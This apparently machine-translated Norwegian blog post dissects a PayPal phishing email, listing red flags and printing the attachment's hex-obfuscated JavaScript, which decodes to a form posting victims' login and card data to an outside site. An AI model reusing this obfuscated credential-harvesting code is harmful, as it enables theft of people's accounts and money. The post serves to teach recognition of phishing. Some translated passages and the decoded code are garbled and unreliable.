10Sep
I dagens verden hvor all informasjon er online, er phishing et av de mest populære og ødeleggende nettangrepene, fordi du alltid kan rydde et virus, men hvis bankinformasjonen din blir stjålet, har du problemer. Her er en sammenfatning av et slikt angrep vi mottok.
Ikke tro at det bare er dine bankdetaljer som er viktige: Hvis noen får kontroll over kontoinnlogging, vet de ikke bare informasjonen i den kontoen, men sjansen er at samme innloggingsinformasjon kan brukes på ulikeandre kontoer. Og hvis de kompromitterer e-postkontoen din, kan de tilbakestille alle de andre passordene dine.
Så i tillegg til å holde sterke og varierende passord, må du alltid være på utkikk etter falske e-postmeldinger som er deilig. Mens de fleste phishing-forsøk er amatørmessige, er noen ganske overbevisende, så det er viktig å forstå hvordan de kan gjenkjenne dem på overflatenivå, og hvordan de fungerer under hetten.
Bilde av asirap
Undersøkelse Hva er i vanlig synsvinkel
Vårt eksempeldatabase, som de fleste phishing-forsøk, "varsler" deg om aktivitet på PayPal-kontoen din, som under normale omstendigheter ville være alarmerende. Så kallet til handling er å bekrefte / gjenopprette kontoen din ved å sende inn omtrent alle opplysninger du kan tenke på.Igjen, dette er ganske formelisk.
Mens det absolutt er unntak, er nesten alle phishing- og svindel-e-postene lastet med røde flagg direkte i meldingen selv. Selv om teksten er overbevisende, kan du vanligvis finne mange feil som er fylt gjennom meldingsorganet som indikerer at meldingen ikke er legitim.
Meldingslegemet
Ved første øyekast er dette en av de bedre phishing-e-postene jeg har sett. Det er ingen stavemåte eller grammatiske feil, og verbiage leser etter hva du kan forvente. Det er imidlertid noen få røde flagg du kan se når du undersøker innholdet litt nærmere.
- "Paypal" - Det riktige tilfellet er "PayPal"( kapital P).Du kan se begge variantene blir brukt i meldingen. Bedrifter er svært bevisst med sin merkevarebygging, så det er tvilsomt noe som dette ville passere korrekturprosessen.
- "Tillat ActiveX" - Hvor mange ganger har du sett en legitim web-basert bedrift, størrelsen på Paypal bruker en proprietær komponent som bare fungerer på en enkelt nettleser, spesielt når de støtter flere nettlesere? Visst, et sted der ute, gjør noen selskaper det, men dette er et rødt flagg.
- "sikkert." - Legg merke til hvordan dette ordet ikke rager opp i marginen med resten av avsnittet. Selv om jeg strekker vinduet litt mer, vil det ikke vikle eller plassere riktig.
- "Paypal!" - Rommet før utropstegnet ser vanskelig ut. Bare en annen quirk som jeg er sikker på, ikke ville være i en legitim e-post.
- "PayPal-kontooppdateringsformular.pdf.htm" - Hvorfor skulle Paypal legge ved en "PDF", spesielt når de bare kunne lenke til en side på nettstedet deres? I tillegg, hvorfor ville de forsøke å skjule en HTML-fil som PDF?Dette er det største røde flagget av dem alle.
Meldingsoverskriften
Når du ser på meldingsoverskriften, vises noen flere røde flagg:
- Den fra adressen er [email protected].
- Til adressen mangler. Jeg har ikke tømt dette ut, det er bare ikke en del av standard meldingsoverskrift. Vanligvis vil et firma som har navnet ditt, personliggjøre e-posten til deg.
Vedlegg
Når jeg åpner vedlegget, kan du umiddelbart se at oppsettet ikke er riktig fordi det mangler stilinformasjon. Igjen, hvorfor ville PayPal sende et HTML-skjema når de bare kunne gi deg en link på nettstedet deres?
Merk: Vi brukte Gmail's innebygde HTML-vedleggsvisning for dette, men vi anbefaler at du IKKE åpner vedlegg fra svindlere. Aldri. Noen gang. De inneholder svært ofte utnyttelser som vil installere trojanere på PCen din for å stjele kontoinformasjonen din.
Ruller ned litt mer, du kan se at dette skjemaet ikke bare krever innloggingsinformasjon for PayPal, men også for bankkort og kredittkortinformasjon. Noen av bildene er ødelagte.
Det er åpenbart at dette phishing-forsøket går etter alt med ett slag.
Den tekniske sammenbrudd
Selv om det skal være ganske klart basert på hva som er klart i det hele tatt at dette er et phishing-forsøk, skal vi nå bryte ned den tekniske sminke av e-posten og se hva vi kan finne.
Informasjon fra vedlegget
Den første tingen å se på er HTML-kilden til vedleggsskjemaet som er det som sender dataene til det falske nettstedet.
Når du raskt ser på kilden, vises alle koblingene gyldige som de peker til enten "paypal.com" eller "paypalobjects.com" som begge er legitime.
Nå skal vi se på noen grunnleggende sideinformasjon som Firefox samler på siden.
Som du kan se, blir noen av grafikkene trukket fra domenene "blessedtobe.com", "goodhealthpharmacy.com" og "pic-upload.de" i stedet for legit PayPal-domener.
Informasjon fra e-posthodene
Neste vil vi se på de raske e-postmeldingshodene. Gmail gjør dette tilgjengelig via alternativet Vis original meny på meldingen.
Ser du på headerinformasjonen for den opprinnelige meldingen, kan du se denne meldingen ble komponert ved hjelp av Outlook Express 6. Jeg tviler på at PayPal har noen på personalet som sender hver av disse meldingene manuelt via en utdatert e-postklient.
Når vi ser på rutingsinformasjonen, kan vi se IP-adressen til både avsenderen og relaying-mailserveren.
"Bruker" IP-adressen er den originale avsenderen.Å gjøre en rask oppslag på IP-informasjonen, vi kan se sendeprofilen er i Tyskland.
Og når vi ser på relaying mail serverens( mail.itak.at), IP-adresse vi kan se dette er en ISP basert i Østerrike. Jeg tviler på at PayPal ruter e-postene direkte gjennom en Østerrike-basert Internett-leverandør når de har en massiv serverfarm som lett kan håndtere denne oppgaven.
Hvor går dataene?
Så vi har klart bestemt at dette er en phishing-e-post og samlet litt informasjon om hvor meldingen stammer fra, men hva med hvor dataene dine sendes?
For å se dette, må vi først lagre HTM vedlegget gjør skrivebordet vårt og åpne i et tekstredigeringsprogram. Ruller gjennom det, alt ser ut til å være i orden, bortsett fra når vi kommer til en mistenkelig jakt-Javascript-blokk.
Bruke hele kilden til den siste blokken Javascript, vi ser:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
Var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for( i = 0; i & lt; x.length; i + = 2){ + y = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;
Når du ser en stor jumbled streng av tilsynelatende tilfeldige bokstaver og tall innebygd i en Javascript-blokk, er det vanligvis noe mistenkelig. Ser man på koden, er variabelen "x" satt til denne store strengen og avkodes deretter til variabelen "y".Det endelige resultatet av variabel "y" skrives deretter til dokumentet som HTML.
Siden den store strengen er laget av tallene 0-9 og bokstavene AF, vil det mest sannsynlig er kodet ved hjelp av en enkel ASCII til Hex konvertering:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
settes til:
& lt; form name =”hoved” id =”hoved”metode = "post" action = "http: //www.dexposure.net/bbs/data/ verifisere.php" & gt;
Det er ikke en tilfeldighet at dette dekoder til en gyldig HTML-formetikett som sender resultatene ikke til PayPal, men til et skurksted.
Når du ser HTML-kilden til skjemaet, ser du at denne skjemaetiketten ikke er synlig fordi den genereres dynamisk via Javascript. Dette er en smart måte å skjule hva HTML-en egentlig gjør hvis noen bare skulle se den genererte kilden til vedlegget( som vi gjorde tidligere) i motsetning til å åpne vedlegget direkte i en tekstredigerer.
Kjører en rask whois på det overordnede nettstedet, vi kan se at dette er et domene som er hostet hos en populær webverten, 1and1.
Hva skiller seg ut er domenet bruker et lesbart navn( i motsetning til noe som "dfh3sjhskjhw.net") og domenet har blitt registrert i 4 år. På grunn av dette tror jeg at dette domenet ble kapret og brukt som en bonde i dette phishing-forsøket.
Cynicism er et godt forsvar
Når det gjelder å holde seg trygg på nettet, blir det aldri vondt å ha en god grad av kynisme.
Mens jeg er sikker på at det er flere røde flagg i eksemplet e-post, er det vi har pekt på ovenfor indikatorer vi så etter bare noen få minutter med undersøkelsen. Hypotetisk, hvis overflatenivået av e-posten etterlignet sin legitime motpart 100%, ville den tekniske analysen fortsatt avsløre sin sanne natur. Derfor importeres det for å kunne undersøke både hva du kan og ikke kan se.